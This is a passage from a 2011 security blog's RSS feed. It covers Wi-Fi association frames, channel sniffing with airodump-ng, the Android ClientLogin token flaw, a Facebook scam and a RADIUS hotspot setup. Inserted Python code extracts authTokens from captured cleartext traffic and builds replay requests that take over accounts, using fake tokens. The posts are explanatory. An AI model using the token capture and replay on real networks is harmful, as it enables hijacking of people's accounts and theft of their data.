&lt;li&gt;&lt;b&gt;Association request frame&lt;/b&gt;: 802.11 association enables the access point to allocate resources for and synchronize with a radio NIC. A NIC begins the association process by sending an association request to an access point. This frame carries information about the NIC (e.g., supported data rates) and the SSID of the network it wishes to associate with. After receiving the association request, the access point considers associating with the NIC, and (if accepted) reserves memory space and establishes an association ID for the NIC.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Association response frame&lt;/b&gt;: An access point sends an association response frame containing an acceptance or rejection notice to the radio NIC requesting association. If the access point accepts the radio NIC, the frame includes information regarding the association, such as association ID and supported data rates. If the outcome of the association is positive, the radio NIC can utilize the access point to communicate with other NICs on the network and systems on the distribution (i.e., Ethernet) side of the access point.&lt;/li&gt;
&lt;/ul&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Disassociation frame&lt;/b&gt;: A station sends a disassociation frame to another station if it wishes to terminate the association. For example, a radio NIC that is shut down gracefully can send a disassociation frame to alert the access point that the NIC is powering off. The access point can then relinquish memory allocations and remove the radio NIC from the association table.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Beacon frame&lt;/b&gt;: The access point periodically sends a beacon frame to announce its presence and relay information, such as timestamp, SSID, and other parameters regarding the access point to radio NICs that are within range. Radio NICs continually scan all 802.11 radio channels and listen to beacons as the basis for choosing which access point is best to associate with.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Probe request frame&lt;/b&gt;: A station sends a probe request frame when it needs to obtain information from another station. For example, a radio NIC would send a probe request to determine which access points are within range.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Probe response frame&lt;/b&gt;: A station responds with a probe response frame, containing capability information, supported data rates, etc., after it receives a probe request frame.&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
OK, let's move on to the actual process. When you switch on your WiFi, how does the card know if there's any network?&lt;br /&gt;
In a WLAN environment with multiple APs there are frames called beacon frames. The beacon announces the network, not the individual access point. If the network consists of just one access point, these are one and the same. Somewhat larger wireless networks will have more than one access point with the same SSID. The beacon offers insufficient information to differentiate between multiple APs with the same SSID.&lt;br /&gt;
I assume you have just one AP; it will still use beacon frames to broadcast the presence of the network.&lt;br /&gt;
The client sends a null broadcast packet called a 'Probe Request' to the APs in its vicinity, asking 'Send me the connections you have'. The AP replies with a 'Probe Response'. The client then sends an 'Authentication Request' to the AP, and the AP responds with 'Authentication Success'.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-qA59qyoHy-A/TdYWwJ-yjjI/AAAAAAAAAcg/mIBVEiOgARg/s1600/Probe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="377" src="http://2.bp.blogspot.com/-qA59qyoHy-A/TdYWwJ-yjjI/AAAAAAAAAcg/mIBVEiOgARg/s400/Probe.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-0OLWhAFyREc/TdYd8noYSBI/AAAAAAAAAco/0VmbomEo4K4/s1600/capt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://3.bp.blogspot.com/-0OLWhAFyREc/TdYd8noYSBI/AAAAAAAAAco/0VmbomEo4K4/s400/capt.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
There are two types of authentication:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Open System authentication&lt;/li&gt;
&lt;li&gt;Shared Key authentication&lt;/li&gt;
&lt;/ul&gt;We will look at these in more detail in a separate post. After authentication the association phase starts: the client sends an association request and the AP replies with an association response.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-nP2aTmZ7IuA/TdYagDwYAYI/AAAAAAAAAck/Nfp6d2lDG0s/s1600/Asso.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="377" src="http://2.bp.blogspot.com/-nP2aTmZ7IuA/TdYagDwYAYI/AAAAAAAAAck/Nfp6d2lDG0s/s400/Asso.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;One important thing client store the SSID of networks&amp;nbsp; in a list called PML to which it has connected in past.So whenever wifi is turned on client send Probe Request for these SSID specifically.After these phases atual data communication starts.If you want more info on any of these phases check IEEE 802.11 standard.&lt;br /&gt;
</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/YvOr7ybEiLk/wifi-hacking-basics-part-3.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-qA59qyoHy-A/TdYWwJ-yjjI/AAAAAAAAAcg/mIBVEiOgARg/s72-c/Probe.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/05/wifi-hacking-basics-part-3.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-8081345819035346351</guid><pubDate>Wed, 18 May 2011 18:04:00 +0000</pubDate><atom:updated>2011-05-19T10:43:39.275+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">android</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><category domain="http://www.blogger.com/atom/ns#">All about Google</category><title>Vulnerability in Android has put 99% android handsets at Risk</title><description>This risk concerns using your Android device to reach Facebook, Twitter and some Google services over unencrypted wireless networks. The apps for these services talk in clear text, which an eavesdropper can intercept. The Google services known to be vulnerable are Google Calendar and Google Contacts; the attack works against any Google service that uses the ClientLogin authentication protocol for access to its data APIs.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-N5Mbq_cMejs/TdQJjGBccuI/AAAAAAAAAcY/UFxSickDmig/s1600/Google-Android-Logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-N5Mbq_cMejs/TdQJjGBccuI/AAAAAAAAAcY/UFxSickDmig/s200/Google-Android-Logo.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;a href="http://code.google.com/apis/accounts/docs/AuthForInstalledApps.html"&gt;ClientLogin&lt;/a&gt; is meant to be used for authentication by installed applications and Android apps. Basically, to use ClientLogin, an application needs to request an authentication token (authToken) from the Google service by passing an account name and password via a https connection. The returned authToken can be used for any subsequent request to the service API and is valid for a maximum duration of 2 weeks. However, if this authToken is used in requests send over unencrypted http, an adversary can easily sniff the authToken (e.g. with Wireshark, see screenshot below). Because the authToken is not bound to any session or device specific information the adversary  can subsequently use the captured authToken to access any personal data which is made available through the service API. For instance, the adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user. This means that the adversary can view, modify or delete any contacts, calendar events, or private pictures.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
What can the attacker do?&lt;br /&gt;
The attack is a form of session stealing (sidejacking), the same idea FireSheep demonstrated against web sessions.&lt;br /&gt;
The attacker sets up a rogue access point (or simply listens on an open wireless network), lets victims connect through it, captures the authToken and then impersonates the user to read and modify the information stored in their account.&lt;br /&gt;
&lt;br /&gt;
Google has released a patch for the ClientLogin problem, but it only ships with Android 2.3.4 and Android 3.0, which means that about 99 percent of Android phones do not have the updated code.&lt;br /&gt;
Courtesy: Ashish Kumar&lt;br /&gt;
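The exposure described above, as an added example that is not part of the original post or of any Google code: a Python scan over captured HTTP requests that flags every cleartext request carrying a ClientLogin authToken in its Authorization header, and builds the replay request an attacker would send with it. The captured requests and the token values are constructed for the example.&lt;br /&gt;

```python
"""Spot Google ClientLogin tokens sent over cleartext HTTP.

Added example, not code from the original post or from Google. It takes
request text as you would get from a capture on an open wireless network
and reports any request that carries a ClientLogin authToken in the
"Authorization: GoogleLogin auth=..." header without TLS. The captured
requests below are constructed for this example; the token values are fake.
"""
import re


def parse_request(raw):
    """Split one HTTP/1.x request into (method, path, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def find_exposed_tokens(captures):
    """captures: list of (transport, raw_request), transport 'http' or 'https'.

    Returns one finding per cleartext request that carries a ClientLogin token.
    """
    findings = []
    for transport, raw in captures:
        if transport != "http":
            continue  # inside TLS the header is not readable by a sniffer
        _method, path, headers = parse_request(raw)
        m = re.match(r"GoogleLogin\s+auth=(\S+)", headers.get("authorization", ""), re.I)
        if m:
            findings.append({"host": headers.get("host", "?"),
                             "path": path, "token": m.group(1)})
    return findings


def replay_request(finding, path=None):
    """Build the request an attacker would send with a captured token.

    The token is not bound to the client or the session, so the same header
    works from any machine until the token expires or is revoked.
    """
    path = path or finding["path"]
    return ("GET %s HTTP/1.1\r\nHost: %s\r\n"
            "Authorization: GoogleLogin auth=%s\r\n\r\n"
            % (path, finding["host"], finding["token"]))


# Constructed sample traffic (fake token values):
CAPTURED = [
    ("http",
     "GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
     "Host: www.google.com\r\n"
     "Authorization: GoogleLogin auth=DQAAAH0AAACFAKE-TOKEN-1\r\n"
     "User-Agent: Android-GData\r\n\r\n"),
    ("https",  # the login itself goes over TLS, so it is not a finding
     "POST /accounts/ClientLogin HTTP/1.1\r\n"
     "Host: www.google.com\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "accountType=HOSTED_OR_GOOGLE\r\n"),
    ("http",
     "GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
     "Host: www.google.com\r\n"
     "Authorization: GoogleLogin auth=DQAAAH0AAACFAKE-TOKEN-2\r\n\r\n"),
    ("http",
     "GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"),
]

if __name__ == "__main__":
    for f in find_exposed_tokens(CAPTURED):
        print("token exposed:", f["host"], f["path"], f["token"][:12] + "...")
        print(replay_request(f))
```

The check to take from this is the transport column: the same header is harmless inside TLS and a complete account takeover outside it, which is why the fix is to send API requests only over HTTPS.&lt;br /&gt;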
</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/FhzSFjCiKFY/vulnerability-in-android-has-put-99.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-N5Mbq_cMejs/TdQJjGBccuI/AAAAAAAAAcY/UFxSickDmig/s72-c/Google-Android-Logo.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/05/vulnerability-in-android-has-put-99.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-5748802395713052576</guid><pubDate>Wed, 18 May 2011 08:02:00 +0000</pubDate><atom:updated>2011-05-18T13:32:57.238+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">WiFi Hacking</category><title>WiFi Hacking Basics Part 2</title><description>In the last post we saw how to set up monitor mode and capture traffic. The second part of the series is about Wi-Fi bands and channels.&lt;br /&gt;
Wi-Fi most commonly operates in the 2.4 GHz radio band, which is divided into channels numbered 1 to 14. The most important thing to remember: a wireless card can sit on only one channel at a time, because each card has a single radio.&lt;br /&gt;
The 802.11 standards used in wireless LANs are:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;802.11a : operating frequency 5 GHz&lt;/li&gt;
&lt;li&gt;802.11b : operating frequency 2.4 GHz&lt;/li&gt;
&lt;li&gt;802.11g : operating frequency 2.4 GHz&lt;/li&gt;
&lt;li&gt;802.11n : operating frequency 2.4 GHz and 5 GHz&lt;/li&gt;
&lt;/ul&gt;These standards are implemented on both the AP and the WLAN card: an 802.11a AP creates an 802.11a network, and so on, and a card needs hardware support for a band before it can tune to channels in it.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3VIhvkbYI_o/TdN4_4Wb0QI/AAAAAAAAAcU/r5sbyVKPHW8/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-3VIhvkbYI_o/TdN4_4Wb0QI/AAAAAAAAAcU/r5sbyVKPHW8/s400/2.png" width="388" /&gt;&lt;/a&gt;&lt;/div&gt;Source:Wikipedia&lt;br /&gt;
In the table above you can see the channels along with their centre frequencies. Countries apply their own regulations to the allowed channels, the allowed users and the maximum power levels within these frequency ranges.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;That was the theory; let's try a demo.&lt;br /&gt;
So how do you put a WLAN card on a specific channel? First verify the current status with&lt;br /&gt;
&lt;i&gt;#iwconfig wlan0&lt;/i&gt;&lt;br /&gt;
To put the card on, say, channel 1 use&lt;br /&gt;
&lt;i&gt;#iwconfig wlan0 channel 1&lt;/i&gt;&lt;br /&gt;
Run &lt;i&gt;iwconfig wlan0&lt;/i&gt; again and check that the Frequency field now reads 2.412 GHz, the centre frequency of channel 1; the card can now sniff traffic on channel 1 only. Selecting a whole band rather than one channel is done with airodump-ng, which hops over every channel of the band you name. 802.11b and 802.11g share the 2.4 GHz channels, while band a is the 5 GHz channels, so if your card supports both you can switch between them with&lt;br /&gt;
&lt;i&gt;#airodump-ng --band {band} mon0&lt;/i&gt;&lt;br /&gt;
for example &lt;i&gt;#airodump-ng --band g mon0&lt;/i&gt; or &lt;i&gt;#airodump-ng --band a mon0&lt;/i&gt;; &lt;i&gt;--band abg&lt;/i&gt; hops across both bands.&lt;br /&gt;
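An added example, not from the original post: Python that converts between channel numbers and centre frequencies for the 2.4 GHz and 5 GHz bands, works out which 2.4 GHz channels do not overlap, and parses iwconfig output (a constructed sample is included) to confirm the card really is on the channel you asked for.&lt;br /&gt;

```python
"""Wi-Fi channel/frequency helper plus a check for `iwconfig wlan0 channel N`.

Added example, not from the original post. The iwconfig text below is a
constructed sample in the format the tool prints; run the real command and
pass its output to parse_iwconfig() to check your own card.
"""
import re


def channel_to_mhz(channel):
    """Centre frequency in MHz: 2.4 GHz ch 1-13 = 2407 + 5*ch, ch 14 = 2484,
    5 GHz ch 36-177 = 5000 + 5*ch."""
    if channel >= 1 and 13 >= channel:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484
    if channel >= 36 and 177 >= channel:
        return 5000 + 5 * channel
    raise ValueError("unknown Wi-Fi channel %r" % channel)


def mhz_to_channel(mhz):
    """Inverse of channel_to_mhz for the frequencies iwconfig reports."""
    if mhz == 2484:
        return 14
    if mhz >= 2412 and 2472 >= mhz and (mhz - 2407) % 5 == 0:
        return (mhz - 2407) // 5
    if mhz >= 5180 and 5885 >= mhz and mhz % 5 == 0:
        return (mhz - 5000) // 5
    raise ValueError("not a Wi-Fi centre frequency: %r MHz" % mhz)


def channels_overlap(a, b, width_mhz=22):
    """Two channels overlap when their centres are closer than one channel
    width; 802.11b/g channels are about 22 MHz wide."""
    return width_mhz > abs(channel_to_mhz(a) - channel_to_mhz(b))


def non_overlapping_24ghz(width_mhz=22):
    """Greedy pick of 2.4 GHz channels that do not overlap each other.
    Yields the familiar 1/6/11 set (plus 14, which only Japan allows for 11b)."""
    chosen = []
    for ch in range(1, 15):
        if all(not channels_overlap(ch, c, width_mhz) for c in chosen):
            chosen.append(ch)
    return chosen


FREQ_RE = re.compile(r"Frequency[:=]\s*([\d.]+)\s*GHz")
MODE_RE = re.compile(r"Mode[:=]\s*(\w+)")


def parse_iwconfig(output):
    """Return (mode, channel) from the text `iwconfig IFACE` prints."""
    mode = MODE_RE.search(output)
    freq = FREQ_RE.search(output)
    if not mode or not freq:
        raise ValueError("no Mode/Frequency fields in iwconfig output")
    mhz = int(round(float(freq.group(1)) * 1000))
    return mode.group(1), mhz_to_channel(mhz)


def on_expected_channel(output, channel):
    """True when iwconfig shows the card on `channel`."""
    return parse_iwconfig(output)[1] == channel


# Constructed sample of `iwconfig wlan0` after `iwconfig wlan0 channel 1`
SAMPLE_IWCONFIG = (
    "wlan0     IEEE 802.11bgn  ESSID:off/any\n"
    "          Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm\n"
    "          Retry  long limit:7   RTS thr:off   Fragment thr:off\n"
)

if __name__ == "__main__":
    print("non-overlapping 2.4 GHz channels:", non_overlapping_24ghz())
    print("card is on:", parse_iwconfig(SAMPLE_IWCONFIG))
```

When the frequency you read back is not the one you asked for, the usual causes are a regulatory domain that forbids the channel or a card that is still associated in managed mode; check with iwconfig before trusting a capture.&lt;br /&gt;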
&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;In next post we will cover some terminology of Wifi world and its meaning ..&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/hfwAtbNj4TY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/hfwAtbNj4TY/wifi-hacking-basics-part-2.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-3VIhvkbYI_o/TdN4_4Wb0QI/AAAAAAAAAcU/r5sbyVKPHW8/s72-c/2.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/05/wifi-hacking-basics-part-2.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-3592811416449677071</guid><pubDate>Tue, 17 May 2011 18:58:00 +0000</pubDate><atom:updated>2011-05-18T00:28:17.538+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><category domain="http://www.blogger.com/atom/ns#">Facebook</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><title>'Enable Dislike Button' scam on Facebook</title><description>Whenever I hated a status message or a shared link on Facebook, I said to myself - "I wish this thing had a dislike button to express my distress".. This must have come to your mind also, specially after disliking some video on Youtube. Well this urge of disliking posts on FB is what hackers are targetting next.. So beware!!! A quick overview of how the hackers get you to click on the link follows:&lt;br /&gt;
&lt;br /&gt;
Here is a screenshot of how the message is posted on your wall:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-w7DoveQizG0/TdLBaOPTwSI/AAAAAAAAAcM/_pZUmYxSjcs/s1600/fb-dislike-button.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="85" src="http://1.bp.blogspot.com/-w7DoveQizG0/TdLBaOPTwSI/AAAAAAAAAcM/_pZUmYxSjcs/s400/fb-dislike-button.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Pay close attention to the 'Enable Dislike Button' link beside 'Comment', in place of the usual Share link. The scammers put it there so users believe it is a genuine feature added by Facebook. &lt;strong&gt;There is no official dislike button on Facebook.&lt;/strong&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Clicking the link has the same consequences you may have experienced with the 'WTF video' or 'Check who is visiting your profile' links: the link gets posted on the walls of random friends and the cycle continues. The link is believed to carry obfuscated JavaScript that spammers use to study browsing behaviour.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Another example relating to the Dislike Button:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-pElMnhc0icE/TdLD3fCWV5I/AAAAAAAAAcQ/BaPM38pd0wE/s1600/dislike-button-address-bar.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-pElMnhc0icE/TdLD3fCWV5I/AAAAAAAAAcQ/BaPM38pd0wE/s400/dislike-button-address-bar.jpg" width="372" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;This one tricks you into pasting JavaScript into your browser's address bar, which runs it with your logged-in Facebook session. Not recommended at all.&lt;/div&gt;&lt;div&gt;Once more: Facebook does not provide a Dislike feature.&lt;/div&gt;&lt;br /&gt;
</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/Lin2mE6RHRg/enable-dislike-button-scam-on-facebook.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-w7DoveQizG0/TdLBaOPTwSI/AAAAAAAAAcM/_pZUmYxSjcs/s72-c/fb-dislike-button.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/05/enable-dislike-button-scam-on-facebook.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-7204450563075638121</guid><pubDate>Sun, 15 May 2011 17:20:00 +0000</pubDate><atom:updated>2011-05-15T22:52:17.556+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">WiFi Hacking</category><title>How To Setup a Wi-Fi Hotspot</title><description>Creating a Wi-Fi Internet hotspot service from scratch can seem like a daunting task. I had many sleepless nights trying to get to grips with FreeRadius, DD-WRT, Chillispot etc. I hope that this How To helps you to avoid some of the problems I encountered along the way.&lt;br /&gt;
&lt;br /&gt;
&lt;div align="center"&gt;&lt;br /&gt;
********Warning ********&lt;/div&gt;Following  these instructions may invalidate your Linksys warranty. You do so at  your own risk. These instructions assume that you have an understanding  of Linux, PHP MySQL and Apache. If you brick your AP you might get it  back by holding down the reset pin for 20 seconds, unplug the power  while still holding down the reset button for another 20 seconds and  then plugging the power back in while still keeping the reset button  held in for a further 20 seconds. This should bring it back to the  defaults of whatever firmware you have installed. You should be able to  login to 192.168.1.1&lt;br /&gt;
&lt;div align="center"&gt;*******End of Warning********&lt;/div&gt;Feel free to copy or use this information in any way you like.&lt;br /&gt;
&lt;br /&gt;
What you will need:-&lt;br /&gt;
&lt;br /&gt;
a) DD-WRT&lt;br /&gt;
Download the latest version here &lt;a href="http://brainslayer.braincontrol.org/dd-wrt.v22.zip"&gt;http://dd-wrt.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
b) FreeRadius&lt;br /&gt;
Download the latest version here &lt;a href="http://www.howtoforge.com/http:freeradius.org" target="_self"&gt;http://freeradius.org/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
c) phpMyPrepaid&lt;br /&gt;
Download the latest version here &lt;a href="http://jabali.net/%7Ecarl/phpMyPrepaid.0.1.3RC2.tar"&gt;http://sourceforge.net&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
d) Linksys WRT54GL AP&lt;br /&gt;
&lt;br /&gt;
e) You will also need PHP, Apache, MySQL and the MySQL development modules (these need to be set up first), some patience, plenty of coffee and cigarettes.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 &lt;/b&gt;: DD-WRT/Chillispot Configuration&lt;br /&gt;
&lt;br /&gt;
Configure the WRT54G with the standard Linksys software, then use its firmware upgrade page to install the DD-WRT image on the AP.&lt;br /&gt;
*******IMPORTANT******* Use your cable connection to do the upgrade, NOT the wireless connection: if the wireless link drops halfway through the flash you can brick the device.&lt;br /&gt;
Reboot the AP and log in to your new firmware.&lt;br /&gt;
Set the WAN connection type to dynamic configuration (DHCP).&lt;br /&gt;
Disable the DHCP server (Chillispot will manage DHCP for your clients).&lt;br /&gt;
Change the local IP of the AP to 192.168.10.1.&lt;br /&gt;
Set your gateway and DNS addresses.&lt;br /&gt;
Apply the changes and log back in at the new IP address.&lt;br /&gt;
&lt;br /&gt;
Go to the administration page.&lt;br /&gt;
Enable Chillispot&lt;br /&gt;
Enter the IP address of your Radius server.&lt;br /&gt;
Enter the DNS.&lt;br /&gt;
Enter the redirect URL, e.g. https://123.123.123.123/cgi-bin/hotspotlogin.cgi/ (make sure the address ends in / and uses https; otherwise the ticket credentials travel in clear text between the client and the login page).&lt;br /&gt;
Enter a shared key (the RADIUS secret; it can be anything you like, but choose something long and random and keep a note of it, you will need it again in the FreeRADIUS client configuration).&lt;br /&gt;
Set DHCP Interface to Lan+Wlan.&lt;br /&gt;
Enter a NAS id (your name for this AP).&lt;br /&gt;
Enter a UAM secret (the password Chilli uses to talk to hotspotlogin.cgi).&lt;br /&gt;
Save your settings and reboot the AP. Give the AP about 10 minutes to reboot and initialise all the new services.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2&lt;/b&gt;: FreeRadius Configuration.&lt;br /&gt;
&lt;br /&gt;
Untar the FreeRADIUS tarball and enter its directory.&lt;br /&gt;
Type ./configure --with-experimental-modules&lt;br /&gt;
make&lt;br /&gt;
Log in as root and type make install&lt;br /&gt;
When this is finished copy the radiusd.conf file that you downloaded earlier to /usr/local/etc/raddb/&lt;br /&gt;
You should not need to edit radiusd.conf.&lt;br /&gt;
Edit /usr/local/etc/raddb/sql.conf and in the SQL section make these changes:&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
# Database type&lt;br /&gt;
# Current supported are: rlm_sql_mysql, rlm_sql_postgresql,&lt;br /&gt;
# rlm_sql_iodbc, rlm_sql_oracle, rlm_sql_unixodbc, rlm_sql_freetds&lt;br /&gt;
driver = "rlm_sql_mysql"&lt;br /&gt;
&lt;br /&gt;
# Connect info&lt;br /&gt;
&lt;br /&gt;
server = "localhost"&lt;br /&gt;
&lt;br /&gt;
login = "yourlogin"&lt;br /&gt;
&lt;br /&gt;
password = "your password"&lt;br /&gt;
&lt;br /&gt;
# Database table configuration&lt;br /&gt;
radius_db = "radius"&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Edit the /usr/local/etc/raddb/clients.conf file and enter the details of your NAS (the AP):&lt;br /&gt;
&lt;br /&gt;
client xxx.xxx.xxx.xxx {&amp;nbsp;&amp;nbsp;# the address of your NAS (the WRT54G)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;secret = xxxxxxx&amp;nbsp;&amp;nbsp;# the shared key you entered in the Chilli config&lt;br /&gt;
&amp;nbsp;&amp;nbsp;shortname = private-network-9&amp;nbsp;&amp;nbsp;# any name&lt;br /&gt;
&amp;nbsp;&amp;nbsp;nastype = other&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;If you want to set up several APs with one secret, the address above can be 0.0.0.0/0. Be aware of what that means: any host that can reach the RADIUS port and knows the secret is then accepted as a NAS, so list each AP's address individually where you can, and never expose the RADIUS port beyond your own network.&lt;br /&gt;
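The shared key entered on the Chillispot page and repeated in clients.conf is what authenticates the AP to FreeRADIUS and FreeRADIUS's answers to the AP. As an added example, not code from this how-to, FreeRADIUS or Chillispot, the Python below follows RFC 2865 to build the Access-Request the NAS sends (User-Password hidden with the secret and the Request Authenticator), lets a minimal server recover the password and answer, and verifies the Response Authenticator on the NAS side. The secret, ticket and NAS identifier are made up, and the Request Authenticator is fixed so the run is deterministic (a real NAS must use 16 fresh random bytes). It also shows why the 0.0.0.0/0 shortcut matters: anyone holding the secret can mint an Access-Accept the AP will trust.&lt;br /&gt;

```python
"""RADIUS shared secret between the NAS (Chillispot) and FreeRADIUS.

Added example, not code from the how-to, FreeRADIUS or Chillispot. Follows
RFC 2865: the NAS hides User-Password with MD5(secret + Request Authenticator)
and the server signs its reply with a Response Authenticator that is MD5 over
the reply plus the secret. Secret, user and NAS identifier are made up.
"""
import hashlib
import hmac

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IDENTIFIER = 1, 2, 32


def attr(atype, value):
    """One RADIUS attribute: type(1) length(1, includes header) value."""
    return bytes([atype, 2 + len(value)]) + value


def packet(code, ident, authenticator, attributes):
    """Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    length = (20 + len(attributes)).to_bytes(2, "big")
    return bytes([code, ident]) + length + authenticator + attributes


def hide_password(password, secret, request_auth):
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with a chained MD5."""
    padded = password + bytes(-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        out += prev
    return out


def reveal_password(hidden, secret, request_auth):
    """Server side of hide_password; padding NULs are stripped."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def access_request(ident, username, password, nas_id, secret, request_auth):
    """What the NAS sends. request_auth must be 16 fresh random bytes in
    real use; the demo fixes it so the run is deterministic."""
    attrs = (attr(USER_NAME, username)
             + attr(USER_PASSWORD, hide_password(password, secret, request_auth))
             + attr(NAS_IDENTIFIER, nas_id))
    return packet(ACCESS_REQUEST, ident, request_auth, attrs)


def response_authenticator(code, ident, request_auth, attributes, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    length = (20 + len(attributes)).to_bytes(2, "big")
    return hashlib.md5(bytes([code, ident]) + length + request_auth
                       + attributes + secret).digest()


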